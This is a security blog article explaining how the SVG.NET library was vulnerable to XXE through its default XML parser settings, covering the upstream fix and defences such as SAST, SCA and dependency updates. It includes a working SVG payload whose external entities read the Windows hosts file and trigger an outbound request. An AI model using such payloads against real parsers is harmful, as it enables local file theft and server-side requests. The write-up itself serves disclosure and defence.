Sergey Vasiliev

Feb 18 2022

Tags:

#CSharp #Security

Why does my app send network requests when I open an SVG file?

Feb 18 2022

Author: Sergey Vasiliev

About the XXE attack
- Compromised data
- Insecurely configured XML parser
Problem fixes
How to protect yourself?
Conclusion

You decided to make an app that works with SVG. Encouraged by the enthusiasm, you collected libraries and successfully made the application. But suddenly you find that the app is sending strange network requests. And data is leaking from the host-machine. How so?

In today's world, you can have a library for every occasion. So, let's not reinvent the wheel for our application and take a ready-made solution. For example, the SVG.NET library. The source code of the project is available on GitHub. SVG.NET is distributed as a NuGet package, which comes in handy if you want to add the library to the project. By the way, according to the project's page in NuGet Gallery, the library has 2.5 million downloads — impressive!

Let's look at the synthetic code example of the previously described application:

void ProcessSvg()
{
  using var svgStream = GetSvgFromUser();    
  var svgDoc = SvgDocument.Open<SvgDocument>(svgStream);    
  
  // SVG document processing...

  SendSvgToUser(svgDoc);
}

The program's logic is simple:

We get a picture from a user. It doesn't matter how we get the picture.
The instance of the SvgDocument type is created. Further, some actions are performed with this instance. For example, some transformations.
The app sends the modified picture back to the user.

In this case, the implementation of the GetSvgFromUser and SendSvgToUser methods is not that important. Let's think that the first method receives the picture over the network, and the second one sends it back.

What is hidden behind "SVG document processing..."? And again, it's not that important to us what's hidden there, so... the application won't perform any actions.

In fact, we just upload the image and get it back. It seems that there is nothing complicated. But it's enough for strange things to start happening. :)

For our experiments, let's take a specially prepared SVG file. It looks like the logo of the PVS-Studio analyzer. Let's see how the logo looks in the browser to make sure that everything is fine with it.

So, no problems with the logo. Next, let's upload it to the app. The application doesn't perform any actions (let me remind you that nothing is hidden behind the comment in the code above). The app just sends the SVG file back to us.

After that, we open the received file and expectedly see the same picture.

The most interesting thing happened behind the scenes (during the SvgDocument.Open<T> method call)

First, the app sent an unplanned request to pvs-studio.com. You can see that, for example, by monitoring the network activity of the application.

And second, the user of the app received the hosts file from the machine on which the SVG was opened.

How? Where is the hosts file? Let's look at the text representation of the SVG file received from the application. Let me remove unnecessary parts so that they do not distract us.

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE svg .... >
<svg ....>
  <style type="text/css">
    ....
  </style>
  <polygon .... />
  <polygon .... />
  <polygon .... />
  <polygon .... />
  <polygon># Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host
#
# localhost name resolution is handled within DNS itself.
#   127.0.0.1       localhost
#   ::1             localhost
#
# A special comment indicating that XXE attack was performed successfully.
#</polygon>
</svg>

Here is the hosts file from the machine — carefully hidden in the SVG file without any external manifestations.

Where does the hosts content come from? Where does the additional network request come from? Well, let's figure it out.

About the XXE attack

Those who know about the XXE attack may have already figured out what's going on. If you haven't heard about XXE or have forgotten what it is, I strongly recommend reading the following article: "Vulnerabilities due to XML file processing: XXE in C# applications in theory and in practice". In the article, I talk about what is XXE, the causes and consequences of the attack. This information will be required to understand the rest of the article.

Let me remind you, to perform an XXE attack you need:

the user's data that may be compromised;
the XML parser that has an insecure configuration.

The attacker also benefits if the compromised data processed by the XML parser returns to them in some form.

In this case, "all the stars are aligned":

compromised data is the SVG file that the user sends to the application;
insecurely configured XML parser — we have it inside the SVG processing library;
the result of the parser's work is returned to the user in the form of the "processed" SVG file.

Compromised data

First, remember that the SVG format is based on XML. That means we can define and use XML entities in the SVG-files. These are the entities that are needed for XXE.

Even though the "dummy" SVG file looks normal in the browser, it contains a declaration of two entities:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE polygon [
  <!ENTITY queryEntity SYSTEM "https://files.pvs-studio.com/rules/ccr.xml">
  <!ENTITY hostsEntity SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
]>
<svg id="Layer_1" 
     data-name="Layer 1" 
     xmlns="http://www.w3.org/2000/svg" 
     viewBox="0 0 1967 1933.8">
  <style type="text/css">
    ....
  </style>
  ....
  <polygon>&queryEntity;</polygon>
  <polygon>&hostsEntity;</polygon>
</svg>

If the XML parser works with external entities, then:

when processing queryEntity, it'll send a network request to files.pvs-studio.com;
when processing hostsEntity, instead of the entity, it'll substitute the contents of the hosts file.

It turns out to be a kind of SVG trap: when rendering, the file looks normal, but inside — it's got something tricky.

Insecurely configured XML parser

Remember that you have to pay a price for using external libraries. If you already had a list of possible negative consequences, here's one more thing – potential security defects.

To create the SvgDocument instance, we used the Open<T> method. Its source code looks as follows:

public static T Open<T>(Stream stream) where T : SvgDocument, new()
{
  return Open<T>(stream, null);
}

This method, in turn, invokes another overload:

public static T Open<T>(Stream stream, Dictionary<string, string> entities) 
  where T : SvgDocument, new()
{
  if (stream == null)
  {
    throw new ArgumentNullException("stream");
  }

  // Don't close the stream via a dispose: that is the client's job.
  var reader = new SvgTextReader(stream, entities)
  {
    XmlResolver = new SvgDtdResolver(),
    WhitespaceHandling = WhitespaceHandling.Significant,
    DtdProcessing = SvgDocument.DisableDtdProcessing ? DtdProcessing.Ignore 
                                                     : DtdProcessing.Parse,
  };
  return Open<T>(reader);
}

Looking ahead, I'd like to say that in Open<T>(reader), the SVG file is read and instance of the SvgDocument is created.

private static T Open<T>(XmlReader reader) where T : SvgDocument, new()
{
  ....
  T svgDocument = null;
  ....

  while (reader.Read())
  {
    try
    {
      switch (reader.NodeType)
      {
        ....
      }
    }
    catch (Exception exc)
    {
      ....
    }
  }
  ....
  return svgDocument;
}

The while (reader.Read()) and switch (reader.nodeType) constructions should be familiar to everyone who worked with XmlReader. It is kind of typical code of XML reading, let's not dwell on it, but return to creating an XML parser.

var reader = new SvgTextReader(stream, entities)
{
  XmlResolver = new SvgDtdResolver(),
  WhitespaceHandling = WhitespaceHandling.Significant,
  DtdProcessing = SvgDocument.DisableDtdProcessing ? DtdProcessing.Ignore 
                                                   : DtdProcessing.Parse,
};

To understand whether the parser configuration is unsafe, you need to clarify the following points:

what the SvgDtdResolver instance is;
whether DTD processing is enabled.

And here I want to say once again — hail to Open Source! It's such an ineffable pleasure — to have a chance to tinker with the code and understand how/the way something works.

Let's start with the DtdProcessing property, that depends on SvgDocument.DisableDtdProcessing:

/// <summary>
/// Skip the Dtd Processing for faster loading of
/// svgs that have a DTD specified.
/// For Example Adobe Illustrator svgs.
/// </summary>
public static bool DisableDtdProcessing { get; set; }

Here's a static property whose value we haven't changed. The property does not appear in the type constructor either. Its default value is false. Accordingly, DtdProcessing takes the DtdProcessing.Parse value.

Let's move on to the XmlResolver property. Let's see what the SvgDtdResolver type is like:

internal class SvgDtdResolver : XmlUrlResolver
{
  /// ....
  public override object GetEntity(Uri absoluteUri, 
                                   string role, 
                                   Type ofObjectToReturn)
  {
    if (absoluteUri.ToString()
                   .IndexOf("svg", 
                            StringComparison.InvariantCultureIgnoreCase) > -1)
    {
      return Assembly.GetExecutingAssembly()
                     .GetManifestResourceStream("Svg.Resources.svg11.dtd");
    }
    else
    {
      return base.GetEntity(absoluteUri, role, ofObjectToReturn);
    }
  }
}

In fact, SvgDtdResolver is still the same XmlUrlResolver. The logic is just a little different for the case when absoluteURI contains the "svg" substring. And from the article about XXE, we remember that the usage of the XmlUrlResolver instance to process external entities is fraught with security issues. It turns out the same situation happens with SvgDtdResolver.

So, all the necessary conditions are met:

DTD processing is enabled (the DtdProcessing property has the DtdProcessing.Parse value);
the parser uses an unsafe resolver (the XmlResolver property refers to an instance of an unsafe SvgDtdResolver).

As a result, the created SvgTextReader object is potentially vulnerable to an XXE attack (as we've seen in practice — it is actually vulnerable).

Problem fixes

An issue was opened about this problem on the project page on GitHub — "Security: vulnerable to XXE attacks". A week later, another issue was opened. A PR was made for each issue: the first pull request, the second one.

In short, the fix is the following: the processing of external entities is turned off by default.

In the first PR, the ResolveExternalResources option was added. The option is responsible whether SvgDtdResolver will process external entities. Processing is disabled by default.

In the second PR, contributors added more code, and the boolean flag was replaced with an enumeration. By default, resolving external entities is still prohibited. There are more changes in the code. If you are interested, you can check them here.

If we update the 'Svg' package to a secure version, run it in the same application and with the same input data (i.e., with a dummy SVG file), we will get different results.

The application no longer performs network requests, nor does it "steal" files. If you look at the resulting SVG file, you may notice that the entities simply weren't processed:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE svg ...>
<svg version="1.1"
     ....>
  <style type="text/css">
    ....
  </style>
  ....
  <polygon />
  <polygon />
</svg>

How to protect yourself?

It depends on who wants to be on the safe side. :)

At least, you should know about XXE to be more careful when it comes to working with XML files. Of course, this knowledge won't protect against all dangerous cases (let's be honest - nothing will protect from them). However, it will give you some awareness of the possible consequences.

SAST solutions can help find similar problems in code. Actually, the list of things that can be caught by SAST is large. And XXE may well be on that list.

The situation is a bit different if you are using an external library, and not working with sources. For example, as in the case of our application, when the SVG library was added as a NuGet package. Here, SAST won't help since the tool does not have access to the source code of the library. Although if the static analyzer works with intermediate code (IL, for example), it still can detect the problem.

However, separate tools — SCA solutions — are used to check project dependencies. You can read the following article to learn about SCA tools. Such tools monitor the use of dependencies with known vulnerabilities and warn about them. In this case, of course, the base of these vulnerable components plays an important role. The larger the base, the better.

And, of course, remember to update the software components. After all, in addition to new features and bug fixes, security defects are also fixed in new versions. For example, in SVG.NET, the security flaw dealt with in this article was closed in the 3.3.0 release.

Conclusion

I've already said, XXE is a rather tricky thing. The instance described in this article is super tricky. Not only did it hide behind the processing of SVG files, it also "sneaked" into application through the NuGet package. Who knows how many other vulnerabilities are hidden in different components and successfully exploited?

Following a good tradition, I invite you to follow me on Twitter so as not to miss interesting publications.

#CSharp #Security